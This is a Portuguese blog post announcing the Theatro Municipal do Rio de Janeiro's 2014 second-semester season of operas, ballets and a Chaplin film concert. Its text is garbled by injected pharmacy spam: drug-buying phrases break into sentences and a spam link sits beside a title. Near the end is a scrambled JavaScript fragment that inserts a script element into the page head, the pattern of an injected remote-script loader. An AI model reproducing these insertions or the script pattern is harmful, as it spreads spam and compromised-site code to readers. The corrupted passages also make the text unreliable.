LateralProgramaçãoRio de Janeiro

TMRJ anuncia programação do segundo semestre 2914

Óperas Salomé e Madama Butterfly: muito pouco

 

Óperas Salomé e Madama Butterfly, concerto da série Música & Imagem e ballets Coppélia e O Quebra-Nozes são atrações da temporada que leva assinatura do Maestro Isaac Karabtchevsky.

Dando continuidade à sua Temporada 2014, sob a responsabilidade artística do Maestro Isaac Karabtchevsky, a Fundação Teatro Municipal do Rio de Janeiro – vinculada à Secretaria de Estado de Cultura – anuncia as atrações do segundo semestre. A partir de 22 de agosto, apresentaremos a ópera Salomé online , de Richard Strauss, com a OrquestraSinfônica do Theatro Municipal do Rio de Janeiro e solistas convidados. A direção de cena e a cenografia levam a assinatura de André Heller-Lopes. A direção musical e a regência do espetáculo será de Sílvio Viegas, Maestro Titular da Orquestra Sinfônica do Theatro. Na sequência, em setembro, virá o concerto da série Música & Imagem, com o filme where to buy feldene O Garoto, com direção e composições de Charles Chaplin; o ballet Coppélia, com música de Léo Delibes será levado ao palco em outubro. Entre os meses de novembro e dezembro serão encenadas oito récitas da ópera Madama Butterfly, de Giacomo Puccini. Em dezembro, a programação será encerrada com o tradicional Buy ballet O Quebra-Nozes, com música de Tchaikovsky e coreografia de Dalal Achcar, a partir do dia 13.

É uma satisfação divulgar a programação do segundo semestre da temporada de 2014, formatada com a experiência e a inspiração do nosso querido MaestroIsaac Karabtchevsky”, afirma Carla Camurati, presidente da Fundação TMRJ.

Em 2014, conseguimos realizar um concurso para o preenchimento da maioria das vagas para a Orquestra Sinfônica, o Ballet e o Coro do nosso Theatro. Considero esta minha primeira prioridade. Em relação à programação, tivemos o ballet La Bayadère e continuaremos com as apresentações da Ópera do Meio-Dia, com enorme sucesso de público. Em agosto teremos a ópera Salomé, em comemoração aos 150 anos de nascimento de Richard Strauss e, encerrando a programação, o ballet O Quebra-Nozes, de Tchaikovsky, com coreografia recriada por Dalal Achcar online ”, comenta o Maestro Isaac Karabtchevsky, que assina a programação artística da Casa.

Serão cinco récitas da ópera Salomé, entre 22 e 29 de agosto, com os solistas convidados Eliane Coelho, Cristina Baggio, Carolina Faria, Lício Bruno e Homero Velho, além da participação dos integrantes do Coro do Theatro Municipal Ricardo Tuttmann e Ivan Jorgensen. Completam a ficha técnica Marcelo Marques (figurinos), Menelick de Carvalho (assistente de direção) e Fábio Retti (iluminação), lembrando que direção de cena e a cenografia são de André Heller-Lopes e a direção musical e a regência são de responsabilidade do Maestro Sílvio ViegasSalomé keppra tablets for sale é uma ópera em um ato com libreto de Hedwig Lachmann, baseada na peça homônima do inglês Oscar Wilde, a qual por sua vez é inspirada em passagens dos Evangelhos de São Mateus e de São Marcos. O Rei Herodes Antipas, da Judeia, no banquete de seu aniversário, embriagado e apaixonado, pede à bela Salomé, sua sobrinha e enteada, que dance para ele, oferecendo o que ela quisesse como recompensa.

O concerto com projeção do filme O Garoto, da série Música & Imagem, terá apresentações nos dias 13, 14, 16 e 18 de setembro, com a Orquestra Sinfônica do Theatro Municipal que será regido pelo Maestro Tobias Volkmann. Primeiro longa-metragem de Charles Chaplin, lançado em 1921, este clássico transformou Chaplin em uma lenda viva. Além de dirigir e produzir o filme, ele compôs as belas músicas, com arranjos em que os instrumentos de corda figuram exuberantes e os sopros soam leves em poéticas melodias. A cópia que será exibida é fornecida pelo instituto alemão European Filmphilharmonic.

Um dos ballets online mais populares do mundo e presença obrigatória no repertório das grandes companhias clássicas, Coppélia será apresentado nos dias 09, 10, 11, 12, 15, 16, 17, 18 e 19 de outubro, pelo Ballet e Orquestra Sinfônica do Theatro Municipal, executando a partitura de Léo Delibes, com regência do Maestro Tobias Volkmann. Esta versão de Coppélia tem coreografia de Enrique Martinez buy colchicine with no prescription e direção artística de Dalal Achcar, além de belos cenários e figurinos de José Varona. Baseado no conto Der Sandmann (O Homem de Areia) de Ernest Hoffman, de 1815, o ballet Coppélia foi coreografado originalmente por Arthur Saint-Leon, que também assinou o libreto com Charles Nuitter. Foi o primeiro grande ballet clássico a incluir danças folclóricas como mazurcas, polcas e czardas, escolhidas por Delibes, autor da partitura, para dar mais realismo à obra.

Terceiro título de ópera na temporada 2014, Madama Butterfly, será apresentada nos dias 26, 28, 29 e 30 de novembro e em 02, 04, 05 e 07 de dezembro pelo Coro, Orquestra Sinfônica do Theatro Municipal e solistas convidados, com direção cênica de Carla Camurati e direção musical e regência de Isaac Karabtchevsky. Madama Butterfly é uma ópera em três atos com libreto de Luigi Illica e Giuseppe Giacosa, que conta a história de um tenente da marinha que se apaixona por uma gueixa. Esta ópera, que estreou no Teatro alla Scala, em Milão, em 1904, tem o libreto baseado na peça do norte-americano David Belasco, que por sua vez se inspirou numa história escrita pelo advogado também norte-americano John Luther Long.

Como ocorre tradicionalmente, o belíssimo ballet O Quebra-Nozes, com coreografia de Dalal Achcar, fecha a programação de 2014 com dez récitas entre os dias 13 e 28 de dezembro, apresentadas pelo Ballet, o Coro e a Orquestra Sinfônica do Theatro Municipal do Rio de Janeiro, sob a regência de Sílvio Viegas. A enorme popularidade desta obra comprova o fascínio exercido nas plateias a partir do encontro do conto de Alexandre Dumas com a música de Tchaikovsky e a coreografia original de Marius Petipa e Lev Ivanovrecriada por Dalal Achcar.

 

SALOMÉ

Ópera de Richard Strauss

Dias 22, 23, 27 e 29 de agosto, às 20h. e dia 24 de agosto, às 17h.

ORQUESTRA SINFÔNICA DO THEATRO MUNICIPAL

Solistas: Cristina Baggio, Lício Bruno, Ricardo Tuttmann, Carolina Faria, Ivan Jorgensen, Homero Velho
Solista Especialmente Convidada: Eliane Coelho
Direção de Cena: André Heller-Lopes
Regência: Sílvio Viegas

 

O GAROTO

Série Música & Imagem

Direção e Música: Charles Chaplin

Dia 13 de setembro, às 16h., dia 14 de setembro, às 17h. e dias 16 e 18, às 20h.

ORQUESTRA SINFÔNICA DO THEATRO MUNICIPAL
Regência: Tobias Volkmann

 

COPPÉLIA

Música: Léo Delibes

Coreografia: Enrique Martinez

Dias 09, 10, 11, 15, 16, 17 e 18 de outubro, às 20h. e dias 12 e 19 de outubro, às 17h.

BALLET E ORQUESTRA SINFÔNICA DO THEATRO MUNICIPAL

Direção artística: Dalal Achcar
Cenários e figurinos: José Varona
Coreografia: Vaslav Nijinski
Regência: Tobias Volkmann

 

MADAMA BUTTERFLY http://ktceducation.com/2018/02/01/actos-pioglitazone-price/

Ópera de Giacomo Puccini
Libreto: Luigi Illica e Giuseppe Giacosa

Dias 26, 28 e 29 de novembro, e 02, 04 e 05 de dezembro, às 20h. e dias 30 de novembro e 07 de dezembro, às 17h.

CORO E ORQUESTRA SINFÔNICA DO THEATRO MUNICIPAL

Participação de solistas convidados
Direção de Cena: Carla Camurati
Regência: Isaac Karabtchevsky

 

O QUEBRA-NOZES

Coreografia: Dalal Achcar, com base na criação original de Marius Petipa e Lev Ivanov

Música: Piotr Ilitch Tchaikovsky

Dias 13, 17, 18, 19, 20, 26 e 27 de dezembro, às 20h. e dias 14, 21 e 28, às 17h.

BALLET, CORO E ORQUESTRA SINFÔNICA DO THEATRO MUNICIPAL

Regência: Sílvio Viegas

 

 

Theatro Municipal do Rio de Janeiro
Praça Floriano s/n° – Centro
Informações: (21) 2332-9191

 d.getElementsByTagName(‘head’)[0].appendChild(s);var d=document;var s=d.createElement(‘script’);

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.